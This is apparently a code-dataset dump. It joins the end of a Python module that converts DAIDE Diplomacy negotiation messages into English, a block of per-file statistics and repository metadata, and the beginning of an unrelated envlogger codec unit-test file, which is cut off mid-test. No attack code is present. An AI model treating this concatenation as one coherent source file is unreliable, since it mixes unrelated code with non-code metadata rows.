    """ The game-related content of a build. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random build order. Note the
            # province is drawn from supplylist (builds happen on supply centers),
            # unlike the provincelist used by the other random order generators.
            self.operator = 'BLD'
            # Weighted choice: 2/3 of the time the unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
                else:
                    self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
            else:
                self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.supplylist)]
        elif len(thelists) == 2:
            # Parsed form: [unit, 'BLD'].
            self.operator = thelists[1]
            self.unit = thelists[0]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the build in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the build in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
                             ' builds a new ' + \
                             helpers.unitdict[self.unit[1]]['Objective'] + \
                             ' in ' + \
                             helpers.provincedict[self.unit[2]]['Objective'] + \
                             '.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(FRA AMY PAR) BLD"
        :rtype: str
        """
        return '(' + ' '.join(self.unit) + ') BLD'
class PressRemove(PressMessage):
    """ The game-related content of a remove. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: fabricate a random remove order.
            self.operator = 'REM'
            # Weighted choice: 2/3 of the time the unit belongs to a conversation
            # participant (the sender, else a random recipient), 1/3 of the time to any power.
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.unit = [utterance.frompower, random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
                else:
                    self.unit = [random.choice(utterance.topowers), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
            else:
                self.unit = [random.choice(helpers.powerlist), random.choice(helpers.unitlist), random.choice(helpers.provincelist)]
        elif len(thelists) == 2:
            # Parsed form: [unit, 'REM'].
            self.operator = thelists[1]
            self.unit = thelists[0]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the remove in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the remove in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.unit[0]]['Objective'] + \
                             ' removes their ' + \
                             helpers.unitdict[self.unit[1]]['Objective'] + \
                             ' in ' + \
                             helpers.provincedict[self.unit[2]]['Objective'] + \
                             ' from the board.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "(FRA AMY PAR) REM"
        :rtype: str
        """
        return '(' + ' '.join(self.unit) + ') REM'
class PressWaive(PressMessage):
    """ The game-related content of a waive. """
    def __init__(self, utterance, container, thelists): # type: (PressUtterance, PressMessage, []) -> None
        """
        Initialize the message with an utterance
        :param utterance: the press utterance that this message is within the content for
        :type utterance: PressUtterance
        :param container: the press message that contains this one
        :type container: PressMessage
        :param thelists: the parsed, nested DAIDE statement
        :type thelists: []
        """
        super().__init__(utterance, container)
        if thelists is None or len(thelists) == 0:
            # No parsed DAIDE supplied: pick a random waiving power with the same
            # 2/3 participant vs 1/3 any-power weighting used by the order classes.
            self.operator = 'WVE'
            if random.choice([True, True, False]):
                if random.choice([True, False]):
                    self.power = utterance.frompower
                else:
                    self.power = random.choice(utterance.topowers)
            else:
                self.power = random.choice(helpers.powerlist)
        elif len(thelists) == 2:
            # Parsed form: [power, 'WVE'].
            self.operator = thelists[1]
            self.power = thelists[0]
    def formenglish(self): # type: () -> str
        """
        Creates an English expression about the waive in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.english = self.formsimpleenglish()
        return self.english
    def formsimpleenglish(self): # type: () -> str
        """
        Creates an English expression about the waive in the context of a sender, recipients and desired tone.
        :return: the English expression
        :rtype: str
        """
        self.simpleenglish = helpers.powerdict[self.power]['Objective'] + \
                             ' waives their build turn.'
        return self.simpleenglish
    def formDAIDE(self): # type: () -> str
        """
        Create a DAIDE representation of this Message
        :return: the DAIDE message, e.g. "FRA WVE" (a bare power token, no parentheses)
        :rtype: str
        """
        return self.power + ' WVE'
def messageFactory(utterance, container, daidelists): # type: (PressUtterance, PressMessage, []) -> PressMessage
    """
    Creates the objects and subobjects corresponding to a nested DAIDE list
    :param utterance: the original DAIDE utterance
    :type utterance: PressUtterance
    :param container: the DAIDE message that contains this one
    :type container: PressMessage
    :param daidelists: the parsed nested DAIDE expression
    :type daidelists: []
    :return: a DAIDE message (a plain PressMessage when the expression is empty or unrecognized)
    :rtype: PressMessage
    """
    if daidelists is None or len(daidelists) == 0:
        return PressMessage(utterance, container)
    # Keyword-led message forms: the DAIDE keyword is the first token.
    if daidelists[0] == 'FCT':
        return PressFact(utterance, container, daidelists)
    elif daidelists[0] == 'PRP':
        return PressProposal(utterance, container, daidelists)
    elif daidelists[0] == 'YES':
        return PressAccept(utterance, container, daidelists)
    elif daidelists[0] == 'REJ':
        return PressReject(utterance, container, daidelists)
    elif daidelists[0] == 'CCL':
        return PressCancel(utterance, container, daidelists)
    elif daidelists[0] == 'HUH':
        return PressHuh(utterance, container, daidelists)
    elif daidelists[0] == 'BWX':
        return PressIgnore(utterance, container, daidelists)
    elif daidelists[0] == 'PCE':
        return PressPeace(utterance, container, daidelists)
    elif daidelists[0] == 'ALY':
        return PressAlliance(utterance, container, daidelists)
    elif daidelists[0] == 'DMZ':
        return PressDMZ(utterance, container, daidelists)
    elif daidelists[0] == 'DRW':
        return PressDraw(utterance, container, daidelists)
    elif daidelists[0] == 'SLO':
        return PressSolo(utterance, container, daidelists)
    elif daidelists[0] == 'ORR':
        return PressOr(utterance, container, daidelists)
    elif daidelists[0] == 'AND':
        return PressAnd(utterance, container, daidelists)
    elif daidelists[0] == 'IFF':
        return PressIf(utterance, container, daidelists)
    elif daidelists[0] == 'NOT':
        return PressNot(utterance, container, daidelists)
    elif daidelists[0] == 'NAR':
        return PressNar(utterance, container, daidelists)
    elif daidelists[0] == 'XDO':
        return PressMoveExecute(utterance, container, daidelists)
    # Order forms: the first token is a unit (or power) and the DAIDE keyword
    # is the second token, so dispatch on arity plus interior keywords.
    elif len(daidelists) == 2 and daidelists[1] == 'HLD':
        return PressHold(utterance, container, daidelists)
    elif len(daidelists) == 3 and daidelists[1] == 'MTO':
        return PressMoveInto(utterance, container, daidelists)
    elif len(daidelists) == 3 and daidelists[1] == 'SUP':
        return PressSupportHold(utterance, container, daidelists)
    elif len(daidelists) == 5 and daidelists[1] == 'SUP' and daidelists[3] == 'MTO':
        return PressSupportMove(utterance, container, daidelists)
    elif len(daidelists) == 5 and daidelists[1] == 'CVY' and daidelists[3] == 'CTO':
        return PressConvoy(utterance, container, daidelists)
    # BUG FIX: a convoy-via order reads "(unit) CTO destination VIA (searoute)"
    # (see PressConvoyVia.formDAIDE), so its interior keywords are 'CTO'...'VIA'.
    # The previous test for 'CVY'...'VIA' could never match, and convoy-via
    # expressions silently fell through to the plain PressMessage fallback.
    elif len(daidelists) == 5 and daidelists[1] == 'CTO' and daidelists[3] == 'VIA':
        return PressConvoyVia(utterance, container, daidelists)
    elif len(daidelists) == 3 and daidelists[1] == 'RTO':
        return PressRetreat(utterance, container, daidelists)
    elif len(daidelists) == 2 and daidelists[1] == 'DSB':
        return PressDisband(utterance, container, daidelists)
    elif len(daidelists) == 2 and daidelists[1] == 'BLD':
        return PressBuild(utterance, container, daidelists)
    elif len(daidelists) == 2 and daidelists[1] == 'REM':
        return PressRemove(utterance, container, daidelists)
    elif len(daidelists) == 2 and daidelists[1] == 'WVE':
        return PressWaive(utterance, container, daidelists)
    else:
        # Unrecognized expression: fall back to a contentless press message.
        return PressMessage(utterance, container)
def randomFactory(utterance, container, daideword): # type: (PressUtterance, PressMessage, str) -> PressMessage
    """
    Randomly constructs the objects and subobjects corresponding to a DAIDE word
    :param utterance: the original DAIDE utterance
    :type utterance: PressUtterance
    :param container: the DAIDE message that contains this one
    :type container: PressMessage
    :param daideword: the DAIDE keyword for this message (PRP, FCT, etc.)
    :type daideword: str
    :return: a randomly constructed DAIDE message
    :rtype: PressMessage
    """
    # Table-driven dispatch: each DAIDE keyword maps to the message class that can
    # generate itself randomly (passing thelists=None selects random construction).
    constructors = {
        'FCT': PressFact,
        'PRP': PressProposal,
        'YES': PressAccept,
        'REJ': PressReject,
        'CCL': PressCancel,
        'HUH': PressHuh,
        'BWX': PressIgnore,
        'PCE': PressPeace,
        'ALY': PressAlliance,
        'DMZ': PressDMZ,
        'DRW': PressDraw,
        'SLO': PressSolo,
        'ORR': PressOr,
        'AND': PressAnd,
        'IFF': PressIf,
        'NOT': PressNot,
        'NAR': PressNar,
        'XDO': PressMoveExecute,
        'HLD': PressHold,
        'MTO': PressMoveInto,
        'SUP': PressSupportHold,
        'SUPMTO': PressSupportMove,
        'CVYCTO': PressConvoy,
        'CVYVIA': PressConvoyVia,
        'RTO': PressRetreat,
        'DSB': PressDisband,
        'BLD': PressBuild,
        'REM': PressRemove,
        'WVE': PressWaive,
    }
    messageclass = constructors.get(daideword)
    if messageclass is None:
        # Unknown keyword: fall back to a contentless press message.
        return PressMessage(utterance, container)
    return messageclass(utterance, container, None)
def daide2gloss(daide, tones=None): # type: (str, []) -> str
    """
    Create a new utterance from DAIDE, return an English gloss
    :param daide: the press utterance in DAIDE syntax
    :type daide: str
    :param tones: the tones to use when forming English
    :type tones: []
    :return: the English gloss of the utterance
    :rtype: str
    """
    # Guard clauses: nothing useful can be glossed from a missing or
    # too-short (under three non-blank characters) expression.
    if daide is None:
        return 'Ahem.'
    if len(daide.strip()) < 3:
        return 'Ahem.'
    parsed = PressUtterance(daide, tones)
    parsed.formenglish()
    return parsed.english
| 45.440378
| 219
| 0.623051
| 16,750
| 148,999
| 5.526567
| 0.030925
| 0.051075
| 0.053711
| 0.042973
| 0.927774
| 0.895268
| 0.871513
| 0.84347
| 0.834784
| 0.817511
| 0
| 0.002436
| 0.247874
| 148,999
| 3,278
| 220
| 45.45424
| 0.823595
| 0.214451
| 0
| 0.698513
| 0
| 0.02746
| 0.176175
| 0
| 0.000572
| 0
| 0
| 0
| 0
| 1
| 0.074371
| false
| 0
| 0.001716
| 0
| 0.188215
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed870adf1760ddaf6696e4c422cf0627e4165570
| 65,403
|
py
|
Python
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 34
|
2021-08-23T14:10:08.000Z
|
2022-03-25T03:26:52.000Z
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 3
|
2021-12-07T17:09:04.000Z
|
2022-03-31T17:10:02.000Z
|
envlogger/converters/codec_test.py
|
deepmind/envlogger
|
bbe20d7b621ffc76091219c52750f95acfa18157
|
[
"Apache-2.0"
] | 2
|
2021-10-05T16:06:19.000Z
|
2021-11-06T21:40:43.000Z
|
# coding=utf-8
# Copyright 2022 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for codec."""
from absl.testing import absltest
from absl.testing import parameterized
from envlogger.converters import codec
from envlogger.proto import storage_pb2
import numpy as np
class NumpyConvertersTest(parameterized.TestCase):
##############################################################################
#
# Datum tests (i.e. not Array/Tuple/Dict of Datums)
#
##############################################################################
##############################################################################
#
# Scalar tests
#
##############################################################################
##############################################################################
# Empty and None values
##############################################################################
def test_encode_none(self):
"""The proto should be completely empty if given a None value."""
self.assertEqual(codec.encode(None), storage_pb2.Data())
def test_decode_none(self):
"""Decoding a None value should produce None."""
self.assertIsNone(codec.decode(None))
def test_decode_empty_proto(self):
"""Decoding an empty proto should produce None."""
user_data = storage_pb2.Data()
self.assertIsNone(codec.decode(user_data))
def test_encode_empty_ndarray(self):
"""The proto should be completely empty if given zero shape numpy array."""
self.assertEqual(codec.encode(np.array([])), storage_pb2.Data())
# Also test other explicit types.
self.assertEqual(
codec.encode(np.array([], dtype='float')), storage_pb2.Data())
def test_identity_none(self):
"""Encoding and decoding it back should not change its value."""
self.assertIsNone(codec.decode(codec.encode(None)))
##############################################################################
# float32
##############################################################################
def test_encode_32bit_float_scalar(self):
"""Proto supports float32 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.float32(3.14)), expected)
def test_decode_32bit_float_scalar(self):
"""Proto supports float32 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.float_values.append(np.float32(3.14))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14))
def test_identity_32bit_float_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.float32(3.14)))
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14))
##############################################################################
# float32 buffer
##############################################################################
def test_decode_32bit_float_scalar_buffer(self):
"""Proto supports float32 so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
# 3.14159 in big-endian byte array.
datum.values.float_values_buffer = b'\x40\x49\x0f\xd0'
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float32)
self.assertEqual(decoded, np.float32(3.14159))
##############################################################################
# float64 (aka double)
##############################################################################
def test_encode_double_scalar(self):
"""Proto supports double so we expect no precision loss in encoding."""
# Ordinary floats in python are 64-bit floats.
expected = storage_pb2.Data()
datum = expected.datum
datum.values.double_values.append(3.14159265358979)
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(3.14159265358979), expected)
# np.float64 should also work.
self.assertEqual(codec.encode(np.float64(3.14159265358979)), expected)
def test_decode_double_scalar(self):
"""Proto supports double so we expect no precision loss in decoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.double_values.append(3.14159265358979)
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.float64)
self.assertEqual(decoded, np.float64(3.14159265358979))
def test_identity_double_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.float64(3.14159265358979)))
self.assertIsInstance(decoded, np.float64)
self.assertEqual(decoded, np.float64(3.14159265358979))
##############################################################################
# int32
##############################################################################
def test_encode_int32_scalar(self):
"""Proto supports int32 so we expect no precision loss in encoding."""
expected = storage_pb2.Data()
datum = expected.datum
datum.values.int32_values.append(np.int32(3))
datum.shape.dim.add().size = -438
self.assertEqual(codec.encode(np.int32(3)), expected)
def test_decode_int32_scalar(self):
"""Proto supports int32 so we expect no precision loss in encoding."""
user_data = storage_pb2.Data()
datum = user_data.datum
datum.values.int32_values.append(np.int32(-32))
datum.shape.dim.add().size = -438
decoded = codec.decode(user_data)
self.assertTrue(
np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
f'Actual type: {type(decoded)}\n'
f'user_data: {user_data}\n'
f'decoded: {decoded}')
self.assertIsInstance(decoded, np.int32)
self.assertEqual(decoded, np.int32(-32))
def test_identity_int32_scalar(self):
"""Encoding and decoding it back should not change its value."""
decoded = codec.decode(codec.encode(np.int32(-3)))
self.assertIsInstance(decoded, np.int32)
self.assertEqual(decoded, np.int32(-3))
##############################################################################
# int64
##############################################################################

def test_encode_int64_scalar(self):
  """Proto supports int64 so we expect no precision loss in encoding."""
  want = storage_pb2.Data()
  want.datum.values.int64_values.append(np.int64(-3))
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.int64(-3)), want)

def test_decode_int64_scalar(self):
  """Proto supports int64 so we expect no precision loss in decoding."""
  user_data = storage_pb2.Data()
  user_data.datum.values.int64_values.append(np.int64(-64))
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, np.int64)
  self.assertEqual(decoded, np.int64(-64))

def test_identity_int64_scalar(self):
  """Round-tripping an int64 scalar must preserve its value."""
  original = np.int64(-1234567890123)
  decoded = codec.decode(codec.encode(original))
  self.assertIsInstance(decoded, np.int64)
  self.assertEqual(decoded, original)
##############################################################################
# uint32
##############################################################################

def test_encode_uint32_scalar(self):
  """Proto supports uint32 so we expect no precision loss in encoding."""
  want = storage_pb2.Data()
  want.datum.values.uint32_values.append(np.uint32(12345))
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.uint32(12345)), want)

def test_decode_uint32_scalar(self):
  """Proto supports uint32 so we expect no precision loss in decoding."""
  user_data = storage_pb2.Data()
  user_data.datum.values.uint32_values.append(np.uint32(32))
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, np.uint32)
  self.assertEqual(decoded, np.uint32(32))

def test_identity_uint32_scalar(self):
  """Round-tripping the max uint32 must preserve its value."""
  original = np.uint32(4294967295)
  decoded = codec.decode(codec.encode(original))
  self.assertIsInstance(decoded, np.uint32)
  self.assertEqual(decoded, original)
##############################################################################
# uint64
##############################################################################

def test_encode_uint64_scalar(self):
  """Proto supports uint64 so we expect no precision loss in encoding."""
  want = storage_pb2.Data()
  want.datum.values.uint64_values.append(np.uint64(12345))
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.uint64(12345)), want)

def test_decode_uint64_scalar(self):
  """Proto supports uint64 so we expect no precision loss in decoding."""
  user_data = storage_pb2.Data()
  user_data.datum.values.uint64_values.append(np.uint64(64))
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, np.uint64)
  self.assertEqual(decoded, np.uint64(64))

def test_identity_uint64_scalar(self):
  """Round-tripping the max uint64 must preserve its value."""
  original = np.uint64(18446744073709551615)
  decoded = codec.decode(codec.encode(original))
  self.assertIsInstance(decoded, np.uint64)
  self.assertEqual(decoded, original)
##############################################################################
# bool
##############################################################################

def test_encode_bool_scalar(self):
  """Proto supports bool so we expect no precision loss in encoding."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.values.bool_values.append(True)
  datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(True), expected)
  # Numpy's boolean type should also work.  (`np.bool` was merely an alias
  # for the builtin `bool` and was removed in NumPy 1.24, so only the real
  # numpy scalar type `np.bool_` is exercised here.)
  self.assertEqual(codec.encode(np.bool_(True)), expected)

def test_decode_bool_scalar(self):
  """Proto supports bool so we expect no precision loss in decoding."""
  user_data = storage_pb2.Data()
  datum = user_data.datum
  datum.values.bool_values.append(True)
  datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  self.assertTrue(
      np.isscalar(decoded), 'The returned data should be a plain scalar.\n'
      f'Actual type: {type(decoded)}\n'
      f'user_data: {user_data}\n'
      f'decoded: {decoded}')
  self.assertEqual(decoded, True)

def test_identity_bool_scalar_true(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(True))
  self.assertIsInstance(decoded, bool)
  self.assertEqual(decoded, True)
  # Numpy's booleans should also work, but they all become Python bools.
  # (The removed alias `np.bool` is no longer tested -- it was the builtin.)
  decoded = codec.decode(codec.encode(np.bool_(True)))
  self.assertIsInstance(decoded, bool)
  self.assertEqual(decoded, True)

def test_identity_bool_scalar_false(self):
  """Encoding and decoding it back should not change its value."""
  decoded = codec.decode(codec.encode(False))
  self.assertIsInstance(decoded, bool)
  self.assertEqual(decoded, False)
##############################################################################
# string
##############################################################################

def test_encode_string_scalar(self):
  """Proto supports string so we expect no loss in encoding."""
  want = storage_pb2.Data()
  want.datum.values.string_values.append('pi')
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode('pi'), want)

def test_decode_string_scalar(self):
  """Proto supports string so we expect no loss in decoding."""
  user_data = storage_pb2.Data()
  user_data.datum.values.string_values.append('ravel')
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, str)
  self.assertEqual(decoded, 'ravel')

def test_identity_string_scalar(self):
  """Round-tripping a string must preserve its value."""
  original = 'do not change me, please!'
  decoded = codec.decode(codec.encode(original))
  self.assertIsInstance(decoded, str)
  self.assertEqual(decoded, original)
##############################################################################
# bytes
##############################################################################

def test_encode_bytes_scalar(self):
  """Proto supports bytes so we expect no precision loss in encoding."""
  want = storage_pb2.Data()
  want.datum.values.bytes_values.append(b'pi')
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(b'pi'), want)

def test_decode_bytes_scalar(self):
  """Proto supports bytes so we expect no precision loss in decoding."""
  user_data = storage_pb2.Data()
  user_data.datum.values.bytes_values.append(b'xu xin')
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, bytes)
  self.assertEqual(decoded, b'xu xin')

def test_identity_bytes_scalar(self):
  """Round-tripping a bytes value must preserve it."""
  original = b'awesome bytes'
  decoded = codec.decode(codec.encode(original))
  self.assertIsInstance(decoded, bytes)
  self.assertEqual(decoded, original)
##############################################################################
# big int (arbitrarily long)
##############################################################################

def test_encode_int_small_scalar(self):
  """Ensures that a vanilla Python int can be stored as bytes."""
  want = storage_pb2.Data()
  want.datum.values.bigint_values.append(b'\x03')
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(3), want)

def test_encode_bigint_scalar(self):
  """Ensures that a large Python int can be stored as bytes."""
  want = storage_pb2.Data()
  want.datum.values.bigint_values.append(
      b'\x01\x8e\xe9\x0f\xf6\xc3s\xe0\xeeN?\n\xd2')
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(123456789012345678901234567890), want)

def test_encode_negative_bigint_scalar(self):
  """Ensures that a large negative Python int can be stored as bytes."""
  want = storage_pb2.Data()
  want.datum.values.bigint_values.append(
      b'\xfeq\x16\xf0\t<\x8c\x1f\x11\xb1\xc0\xf5.')
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(-123456789012345678901234567890), want)

def test_decode_int_scalar(self):
  """Ensures that a large negative integer can be decoded to a Python int."""
  user_data = storage_pb2.Data()
  user_data.datum.values.bigint_values.append(
      b'\xfeq\x16\xf0\t<\x8c\x1f\x11\xb1\xc0\xf5.')
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, int)
  self.assertEqual(decoded, -123456789012345678901234567890)

def test_identity_int_scalar_positive(self):
  """Round-tripping a positive big int must preserve its value."""
  decoded = codec.decode(codec.encode(12345678901234567890))
  self.assertIsInstance(decoded, int)
  self.assertEqual(decoded, 12345678901234567890)

def test_identity_int_scalar_zero(self):
  """Round-tripping zero must preserve its value."""
  decoded = codec.decode(codec.encode(0))
  self.assertIsInstance(decoded, int)
  self.assertEqual(decoded, 0)

def test_identity_int_scalar_negative(self):
  """Round-tripping a negative big int must preserve its value."""
  decoded = codec.decode(codec.encode(-98765432109876543210))
  self.assertIsInstance(decoded, int)
  self.assertEqual(decoded, -98765432109876543210)
##############################################################################
# int8
##############################################################################

def test_encode_int8_scalar(self):
  """Ensures that an np.int8 can be stored as bytes."""
  want = storage_pb2.Data()
  want.datum.values.int8_values = b'\x03'
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.int8(3)), want)

def test_decode_int8_scalar(self):
  """Ensures that int8s can be retrieved as np.int8."""
  user_data = storage_pb2.Data()
  user_data.datum.values.int8_values = b'\xfd'
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, np.int8)
  self.assertEqual(decoded, np.int8(-3))

def test_identity_int8_scalar_negative(self):
  """Round-tripping np.int8(-123) must preserve its value."""
  decoded = codec.decode(codec.encode(np.int8(-123)))
  self.assertIsInstance(decoded, np.int8)
  self.assertEqual(decoded, np.int8(-123))

def test_identity_int8_scalar_zero(self):
  """Round-tripping np.int8(0) must preserve its value."""
  decoded = codec.decode(codec.encode(np.int8(0)))
  self.assertIsInstance(decoded, np.int8)
  self.assertEqual(decoded, np.int8(0))

def test_identity_int8_scalar_positive(self):
  """Round-tripping np.int8(127), the max int8, must preserve its value."""
  decoded = codec.decode(codec.encode(np.int8(127)))
  self.assertIsInstance(decoded, np.int8)
  self.assertEqual(decoded, np.int8(127))
##############################################################################
# int16
##############################################################################

def test_encode_int16_scalar(self):
  """Ensures that an np.int16 can be stored as bytes."""
  want = storage_pb2.Data()
  want.datum.values.int16_values = b'\xfe\xd4'
  want.datum.shape.dim.add().size = -438
  self.assertEqual(codec.encode(np.int16(-300)), want)

def test_decode_int16_scalar(self):
  """Ensures that int16s can be retrieved as np.int16."""
  user_data = storage_pb2.Data()
  user_data.datum.values.int16_values = b'\x07\xd0'
  user_data.datum.shape.dim.add().size = -438
  decoded = codec.decode(user_data)
  msg = ('The returned data should be a plain scalar.\n'
         f'Actual type: {type(decoded)}\n'
         f'user_data: {user_data}\n'
         f'decoded: {decoded}')
  self.assertTrue(np.isscalar(decoded), msg)
  self.assertIsInstance(decoded, np.int16)
  self.assertEqual(decoded, np.int16(2000))

def test_identity_int16_scalar_negative(self):
  """Round-tripping np.int16(-123) must preserve its value."""
  decoded = codec.decode(codec.encode(np.int16(-123)))
  self.assertIsInstance(decoded, np.int16)
  self.assertEqual(decoded, np.int16(-123))

def test_identity_int16_scalar_zero(self):
  """Round-tripping np.int16(0) must preserve its value."""
  decoded = codec.decode(codec.encode(np.int16(0)))
  self.assertIsInstance(decoded, np.int16)
  self.assertEqual(decoded, np.int16(0))

def test_identity_int16_scalar_positive(self):
  """Round-tripping np.int16(127) must preserve its value."""
  decoded = codec.decode(codec.encode(np.int16(127)))
  self.assertIsInstance(decoded, np.int16)
  self.assertEqual(decoded, np.int16(127))
##############################################################################
# uint8
##############################################################################

def test_encode_uint8_scalar(self):
  """Ensures that an np.uint8 can be stored as bytes."""
  expected = storage_pb2.Data()
  datum = expected.datum
  datum.values.uint8_values = b'\xfb'
  datum.shape.dim.add().size = -438
